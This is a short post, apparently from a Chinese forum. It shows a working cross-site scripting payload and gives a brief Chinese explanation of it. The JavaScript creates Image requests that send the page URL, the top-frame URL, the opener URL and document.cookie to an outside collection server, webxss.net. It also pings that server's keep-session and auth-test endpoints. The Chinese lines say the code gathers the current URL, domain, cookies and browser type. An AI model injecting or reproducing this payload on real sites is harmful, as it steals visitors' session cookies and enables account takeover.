(function(){(new Image()).src='http://webxss.net//index.php?do=api&id=Q6fQWR&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
if('1'==1){keep=new Image();keep.src='http://webxss.net//index.php?do=keepsession&id=Q6fQWR&url='+escape(document.location)+'&cookie='+escape(document.cookie)};
x=new Image();
x.src="http://webxss.net//authtest.php?id=Q6fQWR&info=login";
下面有图 我觉得 直接 传 代码 看不清。
专门传了张图
取得你当前浏览的网站的URL,顶级域名,浏览器cookie, 浏览器类型
上面有讲了,你直接alert就能看出来,然后通过escape函数进行了报装